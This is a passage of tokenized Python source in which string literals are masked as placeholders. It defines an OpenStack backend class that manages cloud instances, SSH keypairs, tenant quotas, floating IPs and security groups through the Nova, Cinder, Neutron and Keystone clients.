OpenStackBackend ( ServiceBackend ) : <EOL> DEFAULT_TENANT = '<STR_LIT>' <EOL> def __init__ ( self , settings , tenant_id = None ) : <EOL> self . settings = settings <EOL> self . tenant_id = tenant_id <EOL> def get_client ( self , name = None , admin = False ) : <EOL> credentials = { <EOL> '<STR_LIT>' : self . settings . backend_url , <EOL> '<STR_LIT:username>' : self . settings . username , <EOL> '<STR_LIT:password>' : self . settings . password , <EOL> } <EOL> if not admin : <EOL> if not self . tenant_id : <EOL> raise OpenStackBackendError ( <EOL> "<STR_LIT>" ) <EOL> credentials [ '<STR_LIT>' ] = self . tenant_id <EOL> elif self . settings . options : <EOL> credentials [ '<STR_LIT>' ] = self . settings . options . get ( '<STR_LIT>' , self . DEFAULT_TENANT ) <EOL> else : <EOL> credentials [ '<STR_LIT>' ] = self . DEFAULT_TENANT <EOL> attr_name = '<STR_LIT>' if admin else '<STR_LIT>' <EOL> client = getattr ( self , attr_name , None ) <EOL> if hasattr ( self , attr_name ) : <EOL> client = getattr ( self , attr_name ) <EOL> else : <EOL> client = OpenStackClient ( ** credentials ) <EOL> setattr ( self , attr_name , client ) <EOL> if name : <EOL> return getattr ( client , name ) <EOL> else : <EOL> return client <EOL> def __getattr__ ( self , name ) : <EOL> clients = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> for client in clients : <EOL> if name == '<STR_LIT>' . format ( client ) : <EOL> return self . get_client ( client , admin = False ) <EOL> if name == '<STR_LIT>' . format ( client ) : <EOL> return self . get_client ( client , admin = True ) <EOL> raise AttributeError ( <EOL> "<STR_LIT>" % ( self . __class__ . __name__ , name ) ) <EOL> def ping ( self , raise_exception = False ) : <EOL> return True <EOL> def ping_resource ( self , instance ) : <EOL> try : <EOL> self . nova_client . servers . get ( instance . backend_id ) <EOL> except ( ConnectionError , nova_exceptions . ClientException ) : <EOL> return False <EOL> else : <EOL> return True <EOL> def sync ( self ) : <EOL> try : <EOL> self . pull_flavors ( ) <EOL> self . pull_images ( ) <EOL> except ( nova_exceptions . ClientException , glance_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , self . settings . backend_url ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , self . settings . backend_url ) <EOL> def provision ( self , instance , flavor = None , image = None , ssh_key = None , ** kwargs ) : <EOL> if ssh_key : <EOL> instance . key_name = self . get_key_name ( ssh_key ) <EOL> instance . key_fingerprint = ssh_key . fingerprint <EOL> kwargs [ '<STR_LIT>' ] = ssh_key . public_key <EOL> instance . flavor_name = flavor . name <EOL> instance . cores = flavor . cores <EOL> instance . ram = flavor . ram <EOL> instance . flavor_disk = flavor . disk <EOL> instance . disk = instance . system_volume_size + instance . data_volume_size <EOL> if image : <EOL> instance . image_name = image . name <EOL> instance . min_disk = image . min_disk <EOL> instance . min_ram = image . min_ram <EOL> instance . save ( ) <EOL> kwargs [ '<STR_LIT>' ] = flavor . backend_id <EOL> if image : <EOL> kwargs [ '<STR_LIT>' ] = image . backend_id <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex , ** kwargs ) <EOL> def destroy ( self , instance , force = False ) : <EOL> instance . schedule_deletion ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex , force = force ) <EOL> def start ( self , instance ) : <EOL> instance . schedule_starting ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT:start>' ) ( instance . uuid . hex ) <EOL> def stop ( self , instance ) : <EOL> instance . schedule_stopping ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex ) <EOL> def restart ( self , instance ) : <EOL> instance . schedule_restarting ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex ) <EOL> def get_key_name ( self , public_key ) : <EOL> safe_name = self . sanitize_key_name ( public_key . name ) <EOL> key_name = '<STR_LIT>' . format ( public_key . uuid . hex , safe_name ) <EOL> return key_name <EOL> def sanitize_key_name ( self , key_name ) : <EOL> return re . sub ( r'<STR_LIT>' , '<STR_LIT:_>' , key_name ) [ : <NUM_LIT> ] <EOL> def add_ssh_key ( self , ssh_key , service_project_link ) : <EOL> if service_project_link . tenant is not None : <EOL> key_name = self . get_key_name ( ssh_key ) <EOL> self . get_or_create_ssh_key_for_tenant ( <EOL> service_project_link . tenant , key_name , ssh_key . fingerprint , ssh_key . public_key ) <EOL> def get_or_create_ssh_key_for_tenant ( self , tenant , key_name , fingerprint , public_key ) : <EOL> nova = self . nova_client <EOL> try : <EOL> return nova . keypairs . find ( fingerprint = fingerprint ) <EOL> except nova_exceptions . NotFound : <EOL> try : <EOL> return nova . keypairs . create ( name = key_name , public_key = public_key ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> def remove_ssh_key ( self , ssh_key , service_project_link ) : <EOL> if service_project_link . tenant is not None : <EOL> self . remove_ssh_key_from_tenant ( service_project_link . tenant , ssh_key ) <EOL> @ log_backend_action ( ) <EOL> def remove_ssh_key_from_tenant ( self , tenant , key_name , fingerprint ) : <EOL> nova = self . nova_client <EOL> keys = nova . keypairs . findall ( fingerprint = fingerprint ) <EOL> for key in keys : <EOL> if key . name == key_name : <EOL> nova . keypairs . delete ( key ) <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> def _get_instance_state ( self , instance ) : <EOL> nova_to_nodeconductor = { <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . PROVISIONING , <EOL> '<STR_LIT>' : models . Instance . States . ERRED , <EOL> '<STR_LIT>' : models . Instance . States . ERRED , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . STARTING , <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> } <EOL> return nova_to_nodeconductor . get ( instance . status , models . Instance . States . ERRED ) <EOL> def _get_current_properties ( self , model ) : <EOL> return { p . backend_id : p for p in model . objects . filter ( settings = self . settings ) } <EOL> def _are_rules_equal ( self , backend_rule , nc_rule ) : <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . from_port : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . to_port : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . protocol : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] . get ( '<STR_LIT>' , '<STR_LIT>' ) != nc_rule . cidr : <EOL> return False <EOL> return True <EOL> def _are_security_groups_equal ( self , backend_security_group , nc_security_group ) : <EOL> if backend_security_group . name != nc_security_group . name : <EOL> return False <EOL> if len ( backend_security_group . rules ) != nc_security_group . rules . count ( ) : <EOL> return False <EOL> for backend_rule , nc_rule in zip ( backend_security_group . rules , nc_security_group . rules . all ( ) ) : <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> return False <EOL> return True <EOL> def _normalize_security_group_rule ( self , rule ) : <EOL> if rule [ '<STR_LIT>' ] is None : <EOL> rule [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' not in rule [ '<STR_LIT>' ] : <EOL> rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return rule <EOL> def _wait_for_instance_status ( self , server_id , nova , complete_status , <EOL> error_status = None , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> server_id , nova . servers . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_volume_status ( self , volume_id , cinder , complete_status , <EOL> error_status = None , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> volume_id , cinder . volumes . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_snapshot_status ( self , snapshot_id , cinder , complete_status , error_status , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> snapshot_id , cinder . volume_snapshots . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_backup_status ( self , backup , cinder , complete_status , error_status , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> backup , cinder . backups . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_object_status ( self , obj_id , client_get_method , complete_status , error_status = None , <EOL> retries = <NUM_LIT:30> , poll_interval = <NUM_LIT:3> ) : <EOL> complete_state_predicate = lambda o : o . status == complete_status <EOL> if error_status is not None : <EOL> error_state_predicate = lambda o : o . status == error_status <EOL> else : <EOL> error_state_predicate = lambda _ : False <EOL> for _ in range ( retries ) : <EOL> obj = client_get_method ( obj_id ) <EOL> if complete_state_predicate ( obj ) : <EOL> return True <EOL> if error_state_predicate ( obj ) : <EOL> return False <EOL> time . sleep ( poll_interval ) <EOL> else : <EOL> return False <EOL> def _wait_for_volume_deletion ( self , volume_id , cinder , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> cinder . volumes . get ( volume_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except cinder_exceptions . NotFound : <EOL> return True <EOL> def _wait_for_snapshot_deletion ( self , snapshot_id , cinder , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> cinder . volume_snapshots . get ( snapshot_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except ( cinder_exceptions . NotFound , keystone_exceptions . NotFound ) : <EOL> return True <EOL> def _wait_for_instance_deletion ( self , backend_instance_id , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> nova = self . nova_client <EOL> try : <EOL> for _ in range ( retries ) : <EOL> nova . servers . get ( backend_instance_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except nova_exceptions . NotFound : <EOL> return True <EOL> def pull_flavors ( self ) : <EOL> nova = self . nova_admin_client <EOL> with transaction . atomic ( ) : <EOL> cur_flavors = self . _get_current_properties ( models . Flavor ) <EOL> for backend_flavor in nova . flavors . findall ( is_public = True ) : <EOL> cur_flavors . pop ( backend_flavor . id , None ) <EOL> models . Flavor . objects . update_or_create ( <EOL> settings = self . settings , <EOL> backend_id = backend_flavor . id , <EOL> defaults = { <EOL> '<STR_LIT:name>' : backend_flavor . name , <EOL> '<STR_LIT>' : backend_flavor . vcpus , <EOL> '<STR_LIT>' : backend_flavor . ram , <EOL> '<STR_LIT>' : self . gb2mb ( backend_flavor . disk ) , <EOL> } ) <EOL> models . Flavor . objects . filter ( backend_id__in = cur_flavors . keys ( ) ) . delete ( ) <EOL> def pull_images ( self ) : <EOL> glance = self . glance_admin_client <EOL> with transaction . atomic ( ) : <EOL> cur_images = self . _get_current_properties ( models . Image ) <EOL> for backend_image in glance . images . list ( ) : <EOL> if backend_image . is_public and not backend_image . deleted : <EOL> cur_images . pop ( backend_image . id , None ) <EOL> models . Image . objects . update_or_create ( <EOL> settings = self . settings , <EOL> backend_id = backend_image . id , <EOL> defaults = { <EOL> '<STR_LIT:name>' : backend_image . name , <EOL> '<STR_LIT>' : backend_image . min_ram , <EOL> '<STR_LIT>' : self . gb2mb ( backend_image . min_disk ) , <EOL> } ) <EOL> models . Image . objects . filter ( backend_id__in = cur_images . keys ( ) ) . delete ( ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def push_tenant_quotas ( self , tenant , quotas ) : <EOL> if '<STR_LIT>' in quotas : <EOL> quotas_ratios = django_settings . NODECONDUCTOR . get ( '<STR_LIT>' , { } ) <EOL> volume_ratio = quotas_ratios . get ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> snapshots_ratio = quotas_ratios . get ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> quotas [ '<STR_LIT>' ] = volume_ratio * quotas [ '<STR_LIT>' ] <EOL> quotas [ '<STR_LIT>' ] = snapshots_ratio * quotas [ '<STR_LIT>' ] <EOL> cinder_quotas = { <EOL> '<STR_LIT>' : self . mb2gb ( quotas . get ( '<STR_LIT>' ) ) if '<STR_LIT>' in quotas else None , <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> } <EOL> cinder_quotas = { k : v for k , v in cinder_quotas . items ( ) if v is not None } <EOL> nova_quotas = { <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> } <EOL> nova_quotas = { k : v for k , v in nova_quotas . items ( ) if v is not None } <EOL> neutron_quotas = { <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : quotas . get ( '<STR_LIT>' ) , <EOL> } <EOL> neutron_quotas = { k : v for k , v in neutron_quotas . items ( ) if v is not None } <EOL> try : <EOL> if cinder_quotas : <EOL> self . cinder_client . quotas . update ( tenant . backend_id , ** cinder_quotas ) <EOL> if nova_quotas : <EOL> self . nova_client . quotas . update ( tenant . backend_id , ** nova_quotas ) <EOL> if neutron_quotas : <EOL> self . neutron_client . update_quota ( tenant . backend_id , { '<STR_LIT>' : neutron_quotas } ) <EOL> except Exception as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def pull_tenant_quotas ( self , tenant ) : <EOL> nova = self . nova_client <EOL> neutron = self . neutron_client <EOL> cinder = self . cinder_client <EOL> service_project_link = tenant . service_project_link <EOL> try : <EOL> nova_quotas = nova . quotas . get ( tenant_id = tenant . backend_id ) <EOL> cinder_quotas = cinder . quotas . get ( tenant_id = tenant . backend_id ) <EOL> neutron_quotas = neutron . show_quota ( tenant_id = tenant . backend_id ) [ '<STR_LIT>' ] <EOL> except ( nova_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , nova_quotas . ram ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , nova_quotas . cores ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , self . gb2mb ( cinder_quotas . gigabytes ) ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , nova_quotas . instances ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> service_project_link . set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> try : <EOL> volumes = cinder . volumes . list ( ) <EOL> snapshots = cinder . volume_snapshots . list ( ) <EOL> instances = nova . servers . list ( ) <EOL> security_groups = nova . security_groups . list ( ) <EOL> floating_ips = neutron . list_floatingips ( tenant_id = tenant . backend_id ) [ '<STR_LIT>' ] <EOL> flavors = { flavor . id : flavor for flavor in nova . flavors . list ( ) } <EOL> ram , vcpu = <NUM_LIT:0> , <NUM_LIT:0> <EOL> for flavor_id in ( instance . flavor [ '<STR_LIT:id>' ] for instance in instances ) : <EOL> try : <EOL> flavor = flavors . get ( flavor_id , nova . flavors . get ( flavor_id ) ) <EOL> except nova_exceptions . NotFound : <EOL> logger . warning ( '<STR_LIT>' , flavor_id ) <EOL> continue <EOL> ram += getattr ( flavor , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> vcpu += getattr ( flavor , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> except ( nova_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , ram ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , vcpu ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , sum ( self . gb2mb ( v . size ) for v in volumes + snapshots ) ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , len ( instances ) , fail_silently = True ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , len ( security_groups ) ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , len ( sum ( [ sg . rules for sg in security_groups ] , [ ] ) ) ) <EOL> service_project_link . set_quota_usage ( '<STR_LIT>' , len ( floating_ips ) ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def pull_tenant_floating_ips ( self , tenant ) : <EOL> service_project_link = tenant . service_project_link <EOL> neutron = self . neutron_client <EOL> try : <EOL> nc_floating_ips = { ip . backend_id : ip for ip in service_project_link . floating_ips . all ( ) } <EOL> try : <EOL> backend_floating_ips = { <EOL> ip [ '<STR_LIT:id>' ] : ip <EOL> for ip in neutron . list_floatingips ( tenant_id = self . tenant_id ) [ '<STR_LIT>' ] <EOL> if ip . get ( '<STR_LIT>' ) and ip . get ( '<STR_LIT:status>' ) <EOL> } <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> backend_ids = set ( backend_floating_ips . keys ( ) ) <EOL> nc_ids = set ( nc_floating_ips . keys ( ) ) <EOL> with transaction . atomic ( ) : <EOL> for ip_id in nc_ids - backend_ids : <EOL> ip = nc_floating_ips [ ip_id ] <EOL> ip . delete ( ) <EOL> logger . info ( '<STR_LIT>' , ip . uuid ) <EOL> for ip_id in backend_ids - nc_ids : <EOL> ip = backend_floating_ips [ ip_id ] <EOL> created_ip = service_project_link . floating_ips . create ( <EOL> status = ip [ '<STR_LIT:status>' ] , <EOL> backend_id = ip [ '<STR_LIT:id>' ] , <EOL> address = ip [ '<STR_LIT>' ] , <EOL> backend_network_id = ip [ '<STR_LIT>' ] <EOL> ) <EOL> logger . info ( '<STR_LIT>' , created_ip . uuid ) <EOL> for ip_id in nc_ids & backend_ids : <EOL> nc_ip = nc_floating_ips [ ip_id ] <EOL> backend_ip = backend_floating_ips [ ip_id ] <EOL> if nc_ip . status != backend_ip [ '<STR_LIT:status>' ] or nc_ip . address != backend_ip [ '<STR_LIT>' ] or nc_ip . backend_network_id != backend_ip [ '<STR_LIT>' ] : <EOL> if not ( nc_ip . status == '<STR_LIT>' and backend_ip [ '<STR_LIT:status>' ] == '<STR_LIT>' ) : <EOL> nc_ip . status = backend_ip [ '<STR_LIT:status>' ] <EOL> nc_ip . address = backend_ip [ '<STR_LIT>' ] <EOL> nc_ip . backend_network_id = backend_ip [ '<STR_LIT>' ] <EOL> nc_ip . save ( ) <EOL> logger . info ( '<STR_LIT>' , nc_ip . uuid ) <EOL> except Exception as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def pull_tenant_security_groups ( self , tenant ) : <EOL> nova = self . nova_client <EOL> service_project_link = tenant . service_project_link <EOL> try : <EOL> try : <EOL> backend_security_groups = nova . security_groups . list ( ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> nonexistent_groups = [ ] <EOL> unsynchronized_groups = [ ] <EOL> extra_groups = service_project_link . security_groups . exclude ( <EOL> backend_id__in = [ g . id for g in backend_security_groups ] , <EOL> ) <EOL> with transaction . atomic ( ) : <EOL> for backend_group in backend_security_groups : <EOL> try : <EOL> nc_group = service_project_link . security_groups . get ( backend_id = backend_group . id ) <EOL> if not self . _are_security_groups_equal ( backend_group , nc_group ) : <EOL> unsynchronized_groups . append ( backend_group ) <EOL> except models . SecurityGroup . DoesNotExist : <EOL> nonexistent_groups . append ( backend_group ) <EOL> extra_groups . delete ( ) <EOL> if extra_groups : <EOL> logger . debug ( '<STR_LIT>' , <EOL> '<STR_LIT>' . join ( '<STR_LIT>' % ( sg . name , sg . pk ) for sg in extra_groups ) ) <EOL> for backend_group in unsynchronized_groups : <EOL> nc_security_group = service_project_link . security_groups . get ( backend_id = backend_group . id ) <EOL> if backend_group . name != nc_security_group . name : <EOL> nc_security_group . name = backend_group . name <EOL> nc_security_group . state = StateMixin . States . OK <EOL> nc_security_group . save ( ) <EOL> self . pull_security_group_rules ( nc_security_group ) <EOL> logger . debug ( '<STR_LIT>' , <EOL> nc_security_group . name , nc_security_group . pk ) <EOL> for backend_group in nonexistent_groups : <EOL> nc_security_group = service_project_link . security_groups . create ( <EOL> backend_id = backend_group . id , <EOL> name = backend_group . name , <EOL> state = StateMixin . States . OK <EOL> ) <EOL> self . pull_security_group_rules ( nc_security_group ) <EOL> logger . debug ( '<STR_LIT>' , <EOL> nc_security_group . name , nc_security_group . pk ) <EOL> except Exception as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> def pull_security_group_rules ( self , security_group ) : <EOL> nova = self . nova_client <EOL> backend_security_group = nova . security_groups . get ( group_id = security_group . backend_id ) <EOL> backend_rules = [ <EOL> self . _normalize_security_group_rule ( r ) <EOL> for r in backend_security_group . rules <EOL> ] <EOL> nonexistent_rules = [ ] <EOL> unsynchronized_rules = [ ] <EOL> extra_rules = security_group . rules . exclude ( backend_id__in = [ r [ '<STR_LIT:id>' ] for r in backend_rules ] ) <EOL> with transaction . atomic ( ) : <EOL> for backend_rule in backend_rules : <EOL> try : <EOL> nc_rule = security_group . rules . get ( backend_id = backend_rule [ '<STR_LIT:id>' ] ) <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> unsynchronized_rules . append ( backend_rule ) <EOL> except security_group . rules . model . DoesNotExist : <EOL> nonexistent_rules . append ( backend_rule ) <EOL> extra_rules . delete ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> for backend_rule in unsynchronized_rules : <EOL> security_group . rules . filter ( backend_id = backend_rule [ '<STR_LIT:id>' ] ) . update ( <EOL> from_port = backend_rule [ '<STR_LIT>' ] , <EOL> to_port = backend_rule [ '<STR_LIT>' ] , <EOL> protocol = backend_rule [ '<STR_LIT>' ] , <EOL> cidr = backend_rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for backend_rule in nonexistent_rules : <EOL> rule = security_group . rules . create ( <EOL> from_port = backend_rule [ '<STR_LIT>' ] , <EOL> to_port = backend_rule [ '<STR_LIT>' ] , <EOL> protocol = backend_rule [ '<STR_LIT>' ] , <EOL> cidr = backend_rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> backend_id = backend_rule [ '<STR_LIT:id>' ] , <EOL> ) <EOL> logger . info ( '<STR_LIT>' , rule . id ) <EOL> def sync_instance_security_groups ( self , instance ) : <EOL> nova = self . nova_client <EOL> server_id = instance . backend_id <EOL> backend_ids = set ( g . id for g in nova . servers . list_security_group ( server_id ) ) <EOL> nc_ids = set ( <EOL> models . SecurityGroup . objects <EOL> . filter ( instance_groups__instance__backend_id = server_id ) <EOL> . exclude ( backend_id = '<STR_LIT>' ) <EOL> . values_list ( '<STR_LIT>' , flat = True ) <EOL> ) <EOL> for group_id in backend_ids - nc_ids : <EOL> try : <EOL> nova . servers . remove_security_group ( server_id , group_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> for group_id in nc_ids - backend_ids : <EOL> try : <EOL> nova . servers . add_security_group ( server_id , group_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> @ log_backend_action ( ) <EOL> def create_tenant ( self , tenant ) : <EOL> keystone = self . keystone_admin_client <EOL> try : <EOL> backend_tenant = keystone . tenants . create ( tenant_name = tenant . name , description = tenant . description ) <EOL> tenant . backend_id = backend_tenant . id <EOL> tenant . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( ) <EOL> def pull_tenant ( self , tenant ) : <EOL> keystone = self . keystone_admin_client <EOL> if not tenant . backend_id : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> try : <EOL> backend_tenant = keystone . tenants . get ( tenant . backend_id ) <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> tenant . name = backend_tenant . name <EOL> tenant . description = backend_tenant . description <EOL> tenant . save ( ) <EOL> @ log_backend_action ( ) <EOL> def add_admin_user_to_tenant ( self , tenant ) : <EOL> """<STR_LIT>""" <EOL> keystone = self . keystone_admin_client <EOL> try : <EOL> admin_user = keystone . users . find ( name = self . settings . username ) <EOL> admin_role = keystone . roles . find ( name = '<STR_LIT>' ) <EOL> try : <EOL> keystone . roles . add_user_role ( <EOL> user = admin_user . id , <EOL> role = admin_role . id , <EOL> tenant = tenant . backend_id ) <EOL> except keystone_exceptions . Conflict : <EOL> pass <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def create_tenant_user ( self , tenant ) : <EOL> keystone = self . keystone_client <EOL> try : <EOL> user = keystone . users . create ( <EOL> name = tenant . user_username , <EOL> password = tenant . user_password , <EOL> ) <EOL> admin_role = keystone . roles . find ( name = '<STR_LIT>' ) <EOL> keystone . roles . add_user_role ( <EOL> user = user . id , <EOL> role = admin_role . id , <EOL> tenant = tenant . backend_id , <EOL> ) <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> def get_instance ( self , instance_id ) : <EOL> try : <EOL> nova = self . nova_client <EOL> cinder = self . cinder_client <EOL> instance = nova . servers . get ( instance_id ) <EOL> try : <EOL> attached_volume_ids = [ v . volumeId for v in nova . volumes . get_server_volumes ( instance_id ) ] <EOL> if len ( attached_volume_ids ) != <NUM_LIT:2> : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> for volume_id in attached_volume_ids : <EOL> volume = cinder . volumes . get ( volume_id ) <EOL> if volume . bootable == '<STR_LIT:true>' : <EOL> system_volume = volume <EOL> elif volume . bootable == '<STR_LIT:false>' : <EOL> data_volume = volume <EOL> flavor = nova . flavors . get ( instance . flavor [ '<STR_LIT:id>' ] ) <EOL> cores = flavor . vcpus <EOL> ram = flavor . ram <EOL> ips = { } <EOL> for net_conf in instance . addresses . values ( ) : <EOL> for ip in net_conf : <EOL> if ip [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> ips [ '<STR_LIT>' ] = ip [ '<STR_LIT>' ] <EOL> if ip [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> ips [ '<STR_LIT>' ] = ip [ '<STR_LIT>' ] <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( "<STR_LIT>" , instance_id ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> try : <EOL> d = dateparse . parse_datetime ( instance . to_dict ( ) [ '<STR_LIT>' ] ) <EOL> except ( KeyError , ValueError ) : <EOL> launch_time = None <EOL> else : <EOL> if timezone . is_naive ( d ) : <EOL> launch_time = timezone . make_aware ( d , timezone . utc ) <EOL> instance . nc_model_data = dict ( <EOL> name = instance . name or instance . id , <EOL> key_name = instance . key_name or '<STR_LIT>' , <EOL> start_time = launch_time , <EOL> state = self . _get_instance_state ( instance ) , <EOL> created = dateparse . parse_datetime ( instance . created ) , <EOL> cores = cores , <EOL> ram = ram , <EOL> disk = self . gb2mb ( system_volume . size + data_volume . size ) , <EOL> system_volume_id = system_volume . id , <EOL> system_volume_size = self . gb2mb ( system_volume . size ) , <EOL> data_volume_id = data_volume . id , <EOL> data_volume_size = self . gb2mb ( data_volume . size ) , <EOL> internal_ips = ips . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> external_ips = ips . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> security_groups = [ sg [ '<STR_LIT:name>' ] for sg in instance . security_groups ] , <EOL> ) <EOL> except ( glance_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> nova_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> return instance <EOL> def get_resources_for_import ( self ) : <EOL> cur_instances = models . Instance . objects . all ( ) . values_list ( '<STR_LIT>' , flat = True ) <EOL> try : <EOL> instances = self . nova_client . servers . list ( ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> return [ { 